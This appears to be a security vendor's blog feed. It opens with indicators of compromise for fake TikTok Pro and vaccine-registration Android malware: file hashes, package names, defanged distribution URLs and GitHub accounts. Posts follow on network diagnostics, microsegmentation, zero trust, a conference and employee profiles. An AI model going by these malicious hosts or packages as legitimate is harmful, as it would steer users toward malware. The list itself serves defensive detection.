d871d8d9b934e83e2dc1391a905e2871
41aa8fbe680eab948123fe3a7d7d20ee
a6c3b1184b467a5ecc484940c7a5898e
622a8f4f9f892dc65454ff15343f56d9
b6180d14e8a3e3abb7161fd379e2b3e4
f960fb6a092b9c681e7699af9825ffd1
d0d8743c7c1edb42a3036f013bb73f4f
d6fb317d9914c72664d3a4f343e41a7f
2105a7d8bc46ff14a1a3be5de5d2fb2e
// JIO theme
a1a3d79b29884326a8d6df8eb3468758
b392d35e2eff810193398a8b1148d7c6
2867450cc6c0bc491fcd9ded1f5e928e
3476bed0f34113bd53f08f1b78d157e9
381b0e3e9635c0582a085c3f66aa73b1
A few unique package names
com.jijaei.pikapinjan
heartrate.tracker.cameras
com.jadhalno.goplotu
vaccine.india.cororegister
A few distribution URLs
hxxp://tiny[.]cc/Tiktok_pro
hxxps://bharatnewsin[.]
hxxps://tiny[.]cc/Register-Laptop
hxxps://govlapp[.]
GitHub usernames samakaka123 Newindiannews Breakingindianews Hotstarvip Tiktoksproaccount Tiktokprousers Indiantik Tiktokproaccount Tiktokprov2 Ind-bucket Kikalalo753 Quotamangem Tiktosjij Tiktoind D869 Tiktopro Go-laps-register Mytiktokv1 Tiktokprousers Thu, 08 Apr 2021 08:15:24 -0700 Sahil Antil Diagnosing Network Performance Problems in the Work-from-Anywhere Enterprise Whether IT likes it or not, home networks and local internet service providers (ISPs) are now part of the corporate network infrastructure. IT teams must monitor and diagnose performance issues that involve an employee’s home network. The new reality requires IT to shed the traditional assumptions that people are in the office and apps are in the data center, and to adopt an updated methodology for troubleshooting performance problems. Digital experience monitoring (DEM) solutions meet these new challenges. DEM tools leverage a combination of synthetic transaction monitoring, network path monitoring, and endpoint device monitoring to measure, triage, and diagnose issues from the end user’s perspective. DEM tools shed light on the home network so that desktop, network, and security teams can use the following steps to diagnose performance issues: Step 1: Objectively measure digital experience Step 2: Rule out the application Step 3: Examine the endpoint device and the network: Wi-Fi issues Home gateway problem Local ISP connection review Zscaler Digital Experience helps pinpoint network issues Zscaler, the leading cloud security vendor, has recently introduced its own DEM solution called Zscaler Digital Experience (ZDX), integrated with its Zero Trust Exchange cloud security platform. The last year has changed how people work, sending most employees outside the traditional corporate perimeter. IT teams are now responsible for maintaining user experience for diverse home network connections—much of which isn’t under their direct control. 
Enterprises must have visibility into all the traffic connecting to all the assets in their distributed network. DEM solutions fill in the visibility gaps that traditional monitoring tools overlook and allow both network teams and security teams to leverage the same data to optimize end-user experience—no matter where those users sit. This allows IT teams to detect complex home network issues by measuring true digital experience, rule out application issues, and determine whether the issues lie on the end-user device or somewhere on the network path between the user and the application host. Diagnostic drilldown #1: How to measure true digital experience...objectively. When a user complains about poor performance outside the office, IT must objectively verify the claim. Leveraging synthetic transactions from the end-user device is an effective method. Using a synthetic GET to the application’s URL, IT teams can see and measure page load times on the device browser. Constant user monitoring enables the IT team to establish the baseline performance measurements needed for comparison when users report issues. Let’s use ZDX to analyze one performance scenario. Figure 1: Spikes shown for page load time measurements for a critical externally facing application Let’s drill down into this page load time data. The page load time measurements in Figure 1 indicate that the user’s application experience degraded dramatically over several hours and resulted in several outages (noted by red circles). Diagnostic drilldown #2: Rule out the application. Page load time has clearly degraded. That warrants the next investigative step: determining if the application is to blame for performance issues. We start by measuring application server response time (SRT) to see how long it takes the server to respond to a browser’s initial GET command. Figure 2: This data correlates the server response time and page load time. 
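A toy version of such a synthetic probe, assuming a plain HTTP GET stands in for a full browser page load (a real DEM agent also measures DOM render and per-resource fetch times, and this is not ZDX's implementation):

```python
import time
import urllib.request

def synthetic_probe(url: str, timeout: float = 10.0) -> float:
    """Issue a synthetic GET and time the full fetch in milliseconds."""
    start = time.monotonic()
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        resp.read()
    return (time.monotonic() - start) * 1000.0

def baseline(samples):
    """Median of recent probe times: the comparison point for deciding
    whether a user complaint reflects a real degradation."""
    ordered = sorted(samples)
    mid = len(ordered) // 2
    if len(ordered) % 2:
        return ordered[mid]
    return (ordered[mid - 1] + ordered[mid]) / 2
```

Running `synthetic_probe` on a schedule and comparing each new sample against `baseline` of the recent history is the essence of the "constant monitoring establishes a baseline" step described above.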
With some caveats, a high correlation between increases in the page load time and the SRT (as seen in Figure 2 above) indicates that the application might be causing performance issues. It’s essential, however, to verify that the end-to-end network latency has remained stable during this time. Figure 3: This network latency data over time shows stable performance. Network latency appears to have been relatively stable during this period of slower page load times. That, coupled with the SRT correlation, offers further evidence pointing to the application itself as the user-experience-impacting culprit. Diagnostics drilldown #3: Examine the endpoint device and the network. User experience problems can be triggered at an endpoint, so let’s take a closer look at Wi-Fi and client-device performance. Wi-Fi issues The health of the user’s home Wi-Fi network can contribute to performance issues. Use the page load time metrics to find when the user’s performance degraded. Check if end-to-end network latency also rose at the same time. If the rises in page load time and network latency occur together, something in the user device’s path is causing the performance issue. Check if a severe drop in the user’s Wi-Fi access point (AP) signal strength or bandwidth correlates with the high page load time and high latency. If so, the user’s Wi-Fi signal strength is likely the culprit. A simple resolution might be moving closer to the AP, but other issues could be at play: signal interference or an improperly configured home network. Figure 4: Data showing a correlation between app performance and Wi-Fi signal strength and bandwidth Windows and macOS both provide a “Network Bandwidth” metric that shows estimated wireless bandwidth values for each NIC. This metric can identify fluctuations in available bandwidth, which may be caused by weak signal strength, interference, etc. Figure 5: Data showing fluctuations in network bandwidth metrics. 
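The triage rule above (page load time tracks SRT while network latency stays flat, so suspect the application) can be expressed as a simple correlation heuristic. The 0.8 threshold is an arbitrary illustration, not a ZDX default:

```python
def pearson(xs, ys):
    """Pearson correlation coefficient of two equal-length series."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    vx = sum((x - mx) ** 2 for x in xs) ** 0.5
    vy = sum((y - my) ** 2 for y in ys) ** 0.5
    return cov / (vx * vy) if vx and vy else 0.0

def likely_app_issue(plt_ms, srt_ms, latency_ms, r_threshold=0.8):
    """PLT strongly correlated with SRT, but not with network latency,
    points to the application rather than the network."""
    return (pearson(plt_ms, srt_ms) >= r_threshold
            and pearson(plt_ms, latency_ms) < r_threshold)
```

For example, page load times of [100, 200, 300, 400] ms against SRTs of [50, 100, 150, 200] ms correlate perfectly, while a flat latency series does not, so the heuristic points at the application.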
Home gateway problems Not all home networks are created equal: if the causes of performance degradation aren’t apparent in the application or user device, check the user’s home gateway. Older home gateways with outdated firmware are a common source of performance problems. The figure below shows activity for a user device’s “gateway_mac_address”. This is the advertised MAC address of the gateway interface. The gateway’s MAC address changes often, and an “NA” response correlates with page load time spikes and connection losses. Figure 6: Intermittent slowness/outages are affecting all applications. Figure 7: Data examining gateway interface flapping for MAC addresses. This indicates an unstable interface on the home gateway. In this case, an investigation revealed a known issue with the firmware version running on the gateway. A firmware upgrade fixed the problem. Local ISP connection review After ruling out the application and user device, it’s time to analyze the network connection. The hops between the end-user device and the application include the home network, local ISP connection, internet backbone connection, and (in some cases) a forward proxy connection. If the local ISP network connection is the source of the performance problem, it’s important to isolate which hop causes the problem. Outbound path traces collected from the end-user machine, combined with path traces collected from a forward proxy, provide critical details (an available option for existing Zscaler customers). In the example below, page load time degradation correlates with network latency issues (peaking at over 500ms). A hop-by-hop analysis shows that most latency came from the ISP last-mile connection (a common source of excessive delay during the pandemic due to uneven or unstable local internet provider services). This same analysis could have shown latency on any internet backbone hop, forward proxy hop, etc. Figure 8: Page load times showing application performance drop. 
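Isolating the offending hop amounts to differencing the cumulative round-trip times along the path. A minimal sketch, with hop names and numbers invented for illustration:

```python
def worst_hop(trace):
    """Given ordered (hop_name, cumulative_rtt_ms) pairs from a path
    trace, return the hop contributing the largest latency increment."""
    prev_rtt = 0.0
    culprit, worst_delta = None, 0.0
    for hop, rtt in trace:
        delta = rtt - prev_rtt
        if delta > worst_delta:
            culprit, worst_delta = hop, delta
        prev_rtt = rtt
    return culprit, worst_delta
```

Applied to the last-mile example just described, the jump between the home gateway and the ISP hop would dominate the per-hop deltas, fingering the last mile rather than the backbone or a forward proxy.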
Figure 9: Network latency spikes in the last mile A digital experience monitoring (DEM) tool provides real-time user experience monitoring that helps identify issues that contribute to outages, downtime, or disruptions to the user experience. A DEM helps proactively detect and resolve end-user connectivity issues. A DEM: Gathers device performance data to analyze end-user resources and events such as CPU, memory usage, and Wi-Fi connectivity issues that impact end-user experiences. Measures cloud path performance to analyze end-to-end and hop-by-hop network path metrics from every user device to the cloud application. Monitors application performance to measure application metrics such as response time, DNS resolution, etc. By keeping track of end-user metrics and statistics, enterprises can proactively prevent remote employee downtime and ensure productivity for users no matter where they sit. Zscaler, a leading SASE network security vendor, has recently introduced its own DEM solution called Zscaler Digital Experience (ZDX), closely tied to its cloud security platform. Find out more information on Zscaler’s website. Thu, 01 Apr 2021 14:39:55 -0700 Sanjit Ganguli Full Cloud Ahead: A Journey to Zenith Live 2021 When I joined Zscaler last fall, the company was in the final few days before launching its first all-virtual Zenith Live Cloud Summit. It was an enormous undertaking, and dozens of people had worked for months to make it a dynamic experience, in spite of its being virtual, with compelling speakers and material that attendees would find truly useful. I pretty much arrived at Zscaler just in time to turn on my monitor, enter the virtual conference hall, and tune in. In session after session, I learned so much about the company, the market, and, above all, the realities that Zscaler customers are contending with in the real world, along with their vast community of enterprise CIOs, CISOs, and IT professionals at all levels. 
There was something else we all learned last fall: with nearly 14,000 people registered for Zenith Live, it was clear that there’s an ongoing thirst for information. That’s why I’m so excited to announce that we will be hosting an all-new virtual Zenith Live this June. This event will be focused on using zero trust as the foundation for accelerating secure business transformation and fueling your company’s growth at cloud speed. AMERICAS | June 15–16 EUROPE | June 16–17 ASIA-PACIFIC | June 22–23 Since our very first conference in Las Vegas, Zenith Live has always been dedicated to secure transformation and, though we’ll miss meeting everyone in person, this year’s event will be no different. But for most organizations, transformation is well underway. With the widespread use of SaaS and the migration of private apps to public clouds, more business traffic is destined for the cloud than the data center. And starting in 2020, with the remote workforce going from the exception to the rule, most user traffic is being routed over the internet, not the corporate LAN or WAN. As this transformation has accelerated, organizations have begun to realize the promise of the cloud, achieving greater resiliency and flexibility, unprecedented productivity and collaboration, and better customer outcomes. But companies that continue to rely on legacy networking and security solutions are holding up progress, hindering their IT leadership teams’ ability to speed innovation, create new revenue streams, and drive the business forward. We believe that transformation is a business imperative, and its benefits can’t wait, so for Zenith Live 2021, the theme is Full Cloud Ahead. What does it mean to go full cloud ahead? It means leaving behind the technologies of the past that are making you vulnerable to attack and that frustrate users with poor performance and dropped connections. 
It means simplifying your infrastructure and taking advantage of powerful business enablers, such as big data, artificial intelligence, IoT and OT, and machine learning. And for most, it also means greater efficiency and reduced costs. The key to going full cloud ahead is to build on a true zero trust strategy that secures every connection using business policies. At Zenith Live, we’ll be presenting recent innovations in our Zero Trust Exchange platform that will accelerate your transformation with expanded capabilities and greater automation. At Zenith Live, you’ll hear how leading organizations are enabling zero trust right now to achieve their business goals. Learn about trends and innovations during keynotes, panel discussions, and fireside chats with industry leaders. Choose from more than 50 technical sessions and bring real solutions to your organization through architecture workshops and expert-led training. I’m looking forward to being a part of all of it and I hope you will, too. Be sure to register today so you can receive updates on the agenda and notifications when registration for training opens. Tue, 06 Apr 2021 08:00:01 -0700 Chris Kozup Microsegmentation 101 Microsegmentation can be a very effective cybersecurity strategy, helping to stop lateral threat movement, thereby minimizing the blast radius and damage caused by a cybersecurity incident. Despite its huge potential, several key challenges have kept microsegmentation from wider adoption. Why do we need microsegmentation? Most high-profile attacks and security incidents involve an initial infiltration via a vulnerable system or person, followed by lateral movement across the organization’s network. It is this lateral movement that typically allows attackers to escalate the amount of damage they can do. 
The attacker might initially infiltrate or compromise an application that is not considered mission-critical and, therefore, hasn’t been patched, only to use that system as a jumping-off point to other systems that do contain sensitive information. Or, the initial system might be the first infected machine from which a strain of ransomware starts to make its way across the network to other machines. On an open, flat network with very few internal controls, this type of thing happens all too often. The unfortunate truth is that most security efforts have been focused on creating a strong perimeter defense, leaving internal controls and defenses lacking. With the porous nature of today’s enterprise perimeter and the persistence of bad actors, most perimeter defenses will eventually be defeated. Internal controls built on microsegmentation can minimize the damage that an attacker can cause once they get in. How microsegmentation works Microsegmentation works by dividing large, open groups of applications or workloads into small segments based on the communication requirements of each application. Applications are then permitted to communicate within their segment, but cannot make unauthorized communications to applications outside of their segment. Microsegmentation is a core component of a zero trust security model for workloads in the cloud and data center. In short, microsegmentation picks up where perimeter security ends, enforcing policy throughout the organization’s internal network, not just at the perimeter. For example, a customer relationship management (CRM) web application would be permitted to communicate with the database that stores the corresponding customer data, but the system coordinating physical building operations and security would not be able to connect to that same database. Microsegmentation is most often applied at either the host level or the network level. 
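The CRM example boils down to an explicit allow-list with an implicit default-deny. A toy sketch, where the workload names and policy format are hypothetical:

```python
# Hypothetical segment policy: only listed (source, destination) pairs
# may communicate; everything else is denied by default.
ALLOWED_FLOWS = {
    ("crm-web", "crm-db"),
}

def may_connect(source, destination):
    """Zero trust default: deny unless the pair is explicitly allowed."""
    return (source, destination) in ALLOWED_FLOWS
```

The default-deny stance is the point: the building-operations system never appears in the allow-list, so its attempt to reach the customer database is refused without any rule having to name it.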
Host-based microsegmentation Host-based microsegmentation relies on agents installed on endpoint devices. The advantage of using an agent is that it provides much more granular control and visibility, and offers a path towards easier-to-manage identity-based microsegmentation. By using an agent, you can segment based on dynamic, human-understandable policies rather than on static network-level rules. For example, an identity-based policy might state that a certain Python script can communicate on the network, but a more nefarious process running on the same VM cannot. Such granularity of control and an easy-to-understand policy model are impossible with the network-based approach. The downside of host-based microsegmentation is that not all workloads can have an agent installed on them. These may include legacy operating systems, serverless and PaaS functions, etc. For these types of services, most agent-based platforms will typically include embeddable agent code and/or fall back to network-based segmentation for out-of-scope systems. There are two primary types of host-based microsegmentation: one orchestrates host-based firewalls, and the other leverages identity-based control. Host firewall-based microsegmentation involves a more dynamic version of a traditional network firewall, but with similar limitations. Because all firewalls are blind to the true identity of communicating workloads and rely on network address-based controls, they can be circumvented by attackers that exploit the “trust in the network.” Workload-identity-based protection, on the other hand, allows only cryptographically verified applications to communicate over approved network paths. Every attempted communication is validated, ensuring that bad actors and malicious software have no ability to communicate on the network. 
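Workload-identity-based validation can be thought of as checking a cryptographic fingerprint of the communicating software before permitting a flow. The sketch below—a hash-based allow-list with invented names—illustrates the concept, not any vendor's implementation:

```python
import hashlib

# Hypothetical registry mapping workload identities to the SHA-256
# fingerprint of their verified binaries.
VERIFIED = {
    "report-generator": hashlib.sha256(b"trusted script contents").hexdigest(),
}

def may_communicate(identity, binary_bytes):
    """Allow traffic only from software whose fingerprint matches its
    registered identity; tampered or unknown binaries are rejected."""
    expected = VERIFIED.get(identity)
    actual = hashlib.sha256(binary_bytes).hexdigest()
    return expected is not None and actual == expected
```

Because the check keys on what the software is rather than what address it uses, a malicious process on the same VM cannot ride along on an approved path—the distinction a host firewall cannot make.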
Network-based microsegmentation Network-based microsegmentation is exactly what it sounds like—segmentation performed at the network level by modifying access control lists (ACLs) or firewall rules. Because it is performed at the network layer, there is no agent to deploy onto workloads. There are several major downsides to network-based microsegmentation. First, it can only enforce policies per endpoint. This means that if a legitimate piece of software resides on the same endpoint as a malicious piece of software, the firewalls typically used as enforcement devices cannot distinguish between the two; both pieces of software will either be blocked or allowed. Additionally, because these policies are based on network port and IP address, they are static by definition. In today’s cloud-centric environments, workloads are dynamic and ephemeral. Policies that aren’t equally dynamic slow things down and can cause issues. Finally, this approach can be complicated to manage, often leading to larger segments than originally anticipated, a tradeoff that lowers operational overhead but undermines the very point of doing microsegmentation in the first place. Any attempt at more granular segmentation (i.e., microsegmentation) leads to a massive increase in the number of firewall rules, which becomes unmanageably complex. Challenges with microsegmentation Despite its effectiveness in reducing the risk and impact of a breach, many microsegmentation projects fail in implementation. There are several key reasons for this, most of which can be traced back to operational complexity and too little automation requiring too much human involvement. Newer microsegmentation products have been designed to overcome these challenges. One of the biggest challenges with microsegmentation is mapping out the appropriate communication paths for each piece of software, which provides the basis for policies. 
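The per-endpoint limitation is easy to see in code: a network ACL matches on addresses and ports, so every process on a permitted host gets the same verdict. A simplified sketch, with addresses and rules invented for illustration:

```python
import ipaddress

# Hypothetical network ACL: (source subnet, destination IP, destination port).
ACL_ALLOW = [
    ("10.0.1.0/24", "10.0.2.10", 5432),  # app subnet -> database
]

def acl_allows(src_ip, dst_ip, dst_port):
    """Return True if any allow rule matches; implicit deny otherwise.

    Note the blindness: a legitimate app and malware on the same source
    host present identical 5-tuples, so both match the same rule.
    """
    src = ipaddress.ip_address(src_ip)
    for subnet, dst, port in ACL_ALLOW:
        if src in ipaddress.ip_network(subnet) and (dst_ip, dst_port) == (dst, port):
            return True
    return False
```

Anything running on a host inside 10.0.1.0/24 can reach the database here, which is exactly why granular network-based policy sets balloon: distinguishing finer cases means ever more rules.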
Doing this manually requires detailed knowledge of how every workload communicates with every other workload in your cloud and/or data center environment. This level of knowledge doesn’t even exist in most organizations. Without machine learning-driven automation, this can be an incredibly time-consuming process, with the findings outdated by the time the investigation has been completed. Additionally, if not done properly, implementing microsegmentation can break applications. This stumbling block can cause internal pushback on the entire project, and it requires a system that accurately and quickly identifies required communication paths, adapting automatically as the dynamic environment changes. Finally, the underlying network changes required to implement microsegmentation policies can be extensive, leading to downtime, costly mistakes, and difficult coordination across several groups in the organization. More recent advances in microsegmentation have been designed as overlays to the network itself, achieving the desired goal without making any changes to the underlying network. Zscaler Workload Segmentation Zscaler Workload Segmentation (ZWS) was built from the ground up to automate and simplify the process of microsegmentation in any cloud or data center environment. Built on easy-to-understand, identity-based policies, ZWS can, with a single click, reveal risk and apply protection to your workloads—without any changes to the network or applications. ZWS’s software identity-based technology provides gap-free protection with policies that automatically adapt to environmental changes. Eliminating your network attack surface has never been simpler, and you get true zero trust protection. 
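The automated mapping phase described above can be caricatured as mining observed flow logs into candidate allow-rules for operators to review. A toy sketch—the flow-log format is invented, and real products layer machine learning classification and continuous re-learning on top of this:

```python
from collections import defaultdict

def learn_candidate_policy(flow_log):
    """Aggregate observed (source, destination) flows into a draft
    allow-list, replacing weeks of manual dependency mapping."""
    policy = defaultdict(set)
    for src, dst in flow_log:
        policy[src].add(dst)
    return dict(policy)
```

Because the draft policy is regenerated from live observations, it can keep pace with workloads that appear and disappear—the adaptation that static, hand-maintained rule sets lack.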
Thu, 01 Apr 2021 08:00:01 -0700 Rich Campagna Celebrating Women at Zscaler: Pooja Deshmukh & Dorothy Meshack In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential and powerful women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Pooja Deshmukh is a Principal Product Manager at Zscaler who feels proud of the impact she’s been able to make in her time with the company as it continues to grow. “When I look at my career at Zscaler, it's been an amazing ride,” she said. “I definitely feel proud of the tangible contributions I could make to Zscaler's business, including introducing a new product line, seeing our top deals, raising the top line, and building teams from scratch. It has always been fun to work with some of the most talented minds in the industry.” She said if she could give her younger self any professional advice, it would be to be more assertive to make sure your voice is heard and to get a mentor early in your career. As for advice for women wanting to get into technology, she recommends always continuing to learn. “I would really like to quote my mentor: 'The best way to learn swimming is to just jump in the pool.' So just jump right in. Get a start. Ask questions. Be at it. Focus on building the building blocks,” she said. “It may be the basics of algorithms, it may be the basics of mathematics. Have your basics right and build on it.” “The technology field is a rapidly changing field. You need to embrace the change. Know that you have to keep up with the pace, and never shy away from learning opportunities.” Outside of work, Pooja enjoys staying active and has picked up a new active hobby during quarantine. “I like to really stay active, maybe a simple walk, a jog, or a bicycle ride,” she said. “But I was never into weight training. Quarantine life gave me an opportunity to focus more on isolated activities. 
So I picked up weight training in the last year.” Dorothy Meshack is a Value Creation Analyst located in Bangalore, India. She is proud of never missing an opportunity to learn and recommends that any woman wanting to get into tech should take the plunge. “I'm extremely proud of having the ability to take up challenges and also balance that out with a mindset to learn,” she said. “I think it's extremely important for everyone to have a learning mindset because learning is a continuous process. And the minute we stop learning, we pretty much drag ourselves down.” “The advice that I have for women wanting to get into technology is don't think twice. Just go for it,” she said. “We need to have more women in technology, where we do not continue to have gender disparity. We are in 2021. We really need to beat that. And for us to beat that, we need to have more and more women joining technology, more and more women in powerful positions.” Dorothy cites her mother as her greatest inspiration when she was growing up. “Despite being a homemaker and having hardly any exposure to the corporate world, she's always taught me to make the right choices and to always stand up for myself. She's given me the power to be independent. And that's extremely important.” Outside of work, Dorothy enjoys cooking, spending time with family, and gardening. "I really enjoy cooking and spending a lot of time with my nieces and nephews, who are all 3, 4, or 5 years old. And I love gardening. That's actually another hobby that I picked up during quarantine. It gives me such a sense of calm to be out there." Tue, 30 Mar 2021 08:00:01 -0700 Kristi Myllenbeck Are you Consistent, Confident, or Courageous? Diving into the Zero Trust Deep-End. This post also appeared on LinkedIn. The 2020 Gartner Zero Trust Market Guide predicts that in just two years, 80 percent of businesses will access new digital applications using Zero Trust Network Access (ZTNA). 
The report also declares that ZTNA security solutions will soon supplant legacy security solutions such as virtual private networks (VPNs) for remote employees and third parties. ZTNA and other cloud security solutions are moving to the forefront of IT plans for two reasons: legacy solutions can’t accommodate enterprise network transformation initiatives, and large, hardware-based security stacks are expensive and can’t scale to meet the added traffic generated by the shift to the cloud. Last January, I would’ve agreed with Gartner’s optimistic ZTNA-adoption assessment. But then the COVID-19 crisis happened. Companies refocused on ensuring business continuity. (In a time of urgency, many look to familiar technology, even if it’s not the best for the situation.) Much of the enterprises’ reactive scrambling involved expanding existing VPN systems. But as entire companies shifted to company-wide work-from-home (WFH) scenarios, enacting long-term security plans became a tactical exercise rather than a strategic one. After “day one” of the crisis, enterprise business continuity plans (BCP) generally took three different paths: Consistent, Confident, and Courageous. Imagine you are at a public pool with your three children, each standing on a different diving board: one at one meter, one at three meters, and one at six meters. Below, we’ll look at all three in the context of zero trust. Consistent The first child at the lowest height—the one-meter diving board—jumps straight into the water: low risk, low concern. This is the “Consistent” approach. In an enterprise security context, the low-diving-board-metaphor business continuity plan includes scaling up work-from-home with current or expanded VPN capacity. As long as that capacity is accessible, Consistent companies can move forward as before with little impact to ongoing operations or productivity. The Consistent approach provides continued, uninterrupted application access without new tools or systems. 
Longer-term network transformation plans are unaffected, and business continues as before. There isn’t enough (or any) pain to force a change to a zero trust adoption strategy. When it comes to security, however, inherent VPN risks now increase exponentially. Increasing WFH increases the risk to your network. More users on the VPN expand the network attack surface: perimeter-based security must encircle each and every individual remote network connection. (Consider each remote employee a new branch office of one.) This extended exposure will continue until circumstances change. And threat actors know this: the recent REvil attack targeted unpatched VPN servers. When it comes to protecting the enterprise “crown jewels,” you can continue to use legacy solutions such as virtual routing and forwarding (VRF), firewalls, or network access control (NAC) to control who accesses what in the network. But recognize that these legacy solutions are expensive to implement and difficult to manage. Alternatively, you can use this opportunity to compare zero trust to legacy solutions for VPNs, third-party access, and operational technology (OT) protection, assuming the crisis doesn’t usurp resources and budget in the meantime, of course. Confident The next child climbs to the three-meter diving platform: higher risk, and some marginal concern on your part. This is comparable to the “Confident” enterprise course. Organizationally, the Confident enterprise quickly adjusts to the new crisis-based reality. Extending legacy system capacity in order to get remote workers functional requires intensive (and probably costly) efforts. As a result, enterprise leadership recognizes how legacy network security architectures limit flexibility. The pandemic offers a use case to demonstrate zero trust as a network transformation solution. You can create test groups to demonstrate ZTNA versus VPNs. 
(For adopting ZTNA solutions, Gartner Research recommends using a pilot group to measure transformation solutions against legacy networks.) Enterprise transformation usually involves numerous stakeholders. This means enterprises must address many architectural risks and concerns. While the current pandemic probably speeds up the adoption process, keeping a zero trust solution depends on seeing immediate benefits from the technology. It also highlights other (perhaps contractual or financial) obligations associated with your legacy architecture. Now is the time to promote any solid data showing zero trust benefits over legacy solutions. This will pique the interest of other teams and business units in the enterprise. Look for support from zero trust providers, trusted advisors, and internal champions. Courageous The third child races up to the six-meter diving board: high risk, high concern. The six-meter diving board may be impressive, but it also triggers insecurity and fear. This is the “Courageous” option. The Courageous enterprise, rather than sticking with legacy architectures or adopting transformation as needed, jumpstarts its transformation strategy immediately. There is risk in this approach. Executing a new transformational strategy while dealing with the pandemic can pose challenges to resources, costs, and responsiveness. Replacing legacy VPN systems with a zero trust solution is an excellent first step. The IT team must identify what applications users are accessing, and where those applications reside (in an internal data center, or in a cloud environment). The sheer number of applications may surprise IT admins, given the proliferation of shadow IT (and often, the lack of visibility into user data traffic). IT must determine how to apply policies so that users can access internal and external applications and services. 
A comprehensive data-traffic audit/application inventory will provide good visibility into both enterprise network traffic and user network behavior. Setting policies in a zero trust architecture—at least in the beginning—can seem like a daunting task. It’s why many organizations choose to jump into the transformation pool from a lower diving board. They fear that policies will hinder employee productivity (too restrictive) or expand the network attack surface (too permissive). But with the risks come greater rewards: Courageous organizations gain the immediate value of a zero trust solution—better security and better performance—and create an agile connectivity environment able to accommodate change. Zero trust supports the type of network transformation that gives enterprises competitive advantages and better customer experiences. (And those impacts will matter when we come out on the other side of the current crisis.) Diving in with zero trust solutions The three pandemic responses are like our three divers: they can all achieve a clean and safe dive into the transformation pool without mishap. Ensuring business continuity during the current pandemic requires a Herculean effort no matter which path a company chooses. The difference is in how the company’s transformation strategy positions its ability to achieve enterprise goals when the crisis is over. “Consistent” organizations will ultimately carry on as before, but will remain a step behind competitors when it comes to transformation. “Confident” enterprises will have significant data at their disposal to use in moving their strategy plans forward. And “Courageous” enterprises will find themselves ahead of the game when transformation’s benefits further their business goals. There are many discussions asking what will happen after the pandemic. Will we return to “normal”? Will the pandemic accelerate transformation strategies? 
My take is that WFH policies and practices will become a more robust part of daily enterprise culture, a go-to strategy as part of BCP, and an entry point for network transformation. There is an enterprise need for flexible and scalable secure application access—in the immediate crisis and beyond. And that makes now a perfect time to begin network transformation. Oh, and go for the high dive. You’ll cause the biggest splash. Tue, 30 Mar 2021 08:00:01 -0700 Kevin Schwarz Celebrating Women at Zscaler: Pratibha Nayak, the First Female Zscaler Employee, on Shaping Zscaler and Staying Curious In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Pratibha Nayak joined Zscaler in 2007 and was the first female employee at the company. Located in Bangalore, India, Pratibha currently serves as a Senior Principal Engineer for the UI team that manages APIs for Zscaler Internet Access (ZIA). “The best aspect of my role at Zscaler is that I get to design and come up with software solutions that can leverage our core complex product underneath and deliver it to the customer as a sleek, user-friendly interface that meets their requirements,” she said. Q: What are you most proud of in your career? A: Joining a startup at a very early stage has given me an edge in understanding the very core fundamentals required for building a world-class product from the ground up. Looking back now, after more than a decade, I feel very proud of the gut decision I made to join Zscaler at a point in time when the startup culture in India was less experimented and sought after. Q: What advice do you have for women wanting to get into tech? A: Today, there is never a dearth of opportunity to learn and succeed in the emerging tech industry. It’s a matter of being passionately curious about what interests you. 
In short, just take the plunge. Q: What do you like to do outside of work? A: I like to spend time outdoors and in nature. Even taking a stroll just to catch a sunrise or sunset across the horizon brightens up my day. I also enjoy playtime with my two young kids, especially when they include me in their role-play activities to play Madame Gazelle from Peppa Pig when they are short of participants! For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: Dianhuan Lin and Wendy Case Celebrating Women at Zscaler: Ashley Albiani on Staying Motivated and Effecting Change Celebrating Women at Zscaler: Wendi Lester and Marina Ayton Thu, 25 Mar 2021 15:00:02 -0700 Kristi Myllenbeck Year One, A.C. (“After COVID”): What’s Next for Cyber Professionals in the New World? I used to work in an office. Now—like most enterprise IT professionals—I work from the kitchen. Or my guest room. Or the patio. Or a socially-distanced “anywhere” with good Wi-Fi. COVID-19 has forced us all to change how we look at, design for, and enable remote access to applications, data, and information resources for our employees. And just as we’re getting used to this telecommute-only phase, we’re about to enter a new age: the After-COVID (AC) era. In the AC era, crises and disruption will happen. As we’ve seen in the last few months, the COVID-19 crisis changed business processes overnight—and caught most companies completely off guard. Their legacy infrastructures couldn’t accommodate the needed changes (in this case, everybody suddenly working outside the office). The AC era means a new flexible working environment: we’re working from home, back in the office, or maintaining a hybrid of the two. 
Corporate environments must be agile enough to respond to future crises: they will happen, and your business must adapt to meet the challenges. The AC era means accepting the disruption of “business as usual.” Beyond enabling business continuity in the face of massive change (such as COVID-19), enterprise IT leaders must look at the new technologies, infrastructures, and services offered by disruptive companies. Large enterprises can no longer sustain inflexible systems that neither pivot nor scale. The new AC world will move too fast for legacy systems to keep up. Let’s not do this again... In my dealings with CISOs and CIOs, I’m hearing two messages loud and clear: Businesses can’t afford to be surprised by another crisis. Something like COVID-19 will happen again, and we’ll have to pivot again. Preserving inflexible networks and moribund cybersecurity technology will restrict future agility. People will access and consume applications and data from anywhere and everywhere. The internet is everything, to everyone, all the time. Applications and data will live outside the corporate network. And employees will too. Accommodating this shift means we need to change how we architect our environments both from a business and a security perspective to support and embrace this new outside-the-perimeter way of work. The struggle to move from legacy hub-and-spoke architectures marked the Before-COVID (BC) enterprise era. Even BC, IT leaders recognized the extent to which a perimeter-based corporate network model was overly-complex, inflexible, easily overwhelmed, and unable to scale to meet application and security transformation demands. The more entrenched these architectures were in enterprises, the less likely enterprises could pivot quickly to match needed changes brought on by a global pandemic (like, say, the need to shift to a 100 percent remote workforce overnight). 
